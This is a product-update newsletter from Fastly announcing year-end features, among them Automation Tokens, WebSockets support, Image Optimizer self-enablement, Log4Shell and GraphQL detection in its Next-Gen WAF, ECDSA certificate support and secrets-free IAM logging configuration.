Hi Fastly customers + friends,
Ending the year out strong, our product portfolio has grown to include even more network services, security, and observability capabilities. Next-Gen WAF now supports Log4Shell attack signal within SmartParse and GraphQL by default to keep up with the evolving threat landscape. To protect against DDoS attacks TLS Support ECSDA Certificates are now available in the Fastly UI. Automation Tokens and customer headers for health checks entered general availability. These features both streamline service management workflows. Two new features, Websockets and Image Optimizer self-enablement are also available in the Fastly console. Google Cloud Storage, BigQuery, and Pub/Sub logging endpoints now do not require saving service keys in the FAstly app, so customers can manage temporary credentials for logging endpoint configuration.
Table of Contents
Automation Token is a type of authentication token used to allow non-human clients, such as continuous integration and build systems, to perform actions via the Fastly API. As Automation Tokens are not tied to human user identities, they mitigate the risk of business interruption for our customers if an individual departs their organization. The tokens also help increase the security posture as access can be restricted to one, all, or multiple services. Automation tokens also support compliance as a result of accurate representation of service activity in the audit log.
This feature allows customers to add custom headers to health check probes in the UI & API without blocking auto-generation of VCLs. This functionality unblocks customers who require pre-shared keys, API keys, and other custom header values in health checks originating from Fastly, without requiring a custom VCL solution as a temporary workaround.
We have added support for Websockets – a channel for open two-way interactive communication between the end user's browser and the origin server. WebSockets are long-lived connections that can carry data in either direction at any time and don’t follow a request-response cycle – our normal processing mode for edge traffic. However, any connection that begins life as an HTTP request can be upgraded to a WebSocket connection. Customers who have WebSockets implemented at their origin can share the same domain used for content delivery. Enable WebSockets directly from your Compute or Delivery environment to begin connection upgrades and backend selection, available via WASM or VCL.
Our powerful Fastly Image Optimizer can now be instantly enabled or disabled within the Fastly App (UI) and API. With self-service, Fastly users have the flexibility and control to manage Image Optimizer at scale, with automation that is fully integrated into existing processes and workflows. Operational complexity and time to value is greatly reduced as our customers’ end users start realizing the value of IO immediately after purchase.
SmartParse has now been extended to receive a complex Log4Shell payload and distill it down into its most basic form. Last year, we issued an immediate virtual patch to protect our customers from CVE-2021-44228, a zero-day vulnerability that targeted Log4j users. Usually our attack and anomaly signals leverage our SmartParse technology but we sometimes implement regex-based immediate virtual patches,especially when variants are evolving by the minute. Leveraging SmartParse provides advanced and precise detection with minimal-to-no false positives and without managing and relying on an ever-expansive regex pattern. With attack signals SmartParse also allows you to build and create rules at an organization or corp level, quickly implementing a response policy across your global organization.
GraphQL Inspection is now in general availability within Fastly’s Next-Gen WAF. Without additional setup, our current set of WAF detections applies to GraphQL requests including OWASP-style attacks and attack traffic. We added GraphQL-specific attack and anomaly Signals so that customers can apply specific routing to handle certain targeted attacks, as well as apply customs rules. As common attack vectors increasingly evolve, so does API security with new technology and out-of-the-box solutions like GraphQL Inspection.
Customer provisioned ECDSA (Elliptical Curve Digital Signature Algorithm) certificates can be uploaded and deployed just the same as RSA certificates, via our Fastly application or user interface. Industry standard RSA certificates have not changed much in the past, but as the scale of Distributed Denial of Service (DDoS)) attacks expand, organizations are upgrading their TLS protocol. When RSA key lengths get too large (key lengths of 4048 bits), the TLS handshake becomes a potential DDoS vector. ECDSA certificates improve security and the speed at which end users are connected to services by using smaller Public Key Infrastructure (PKI) keys that require less compute power while establishing a TLS connection.
IAM (Identity Access Management) secrets-free authentication makes configuring Google Cloud Storage, BigQuery, and Pub/Sub logging endpoints simple and secure by managing temporary credentials on your behalf instead of asking you to store your service account keys with Fastly. With this level of enterprise-grade access control, centralized access management eliminates the need for local identities for logging configurations - reducing costs by making application administration simple and faster and increasing productivity by automating the IAM lifecycle. IAM adheres to compliance standards by verifying protections on your data, including who has access to it and how that access is protected.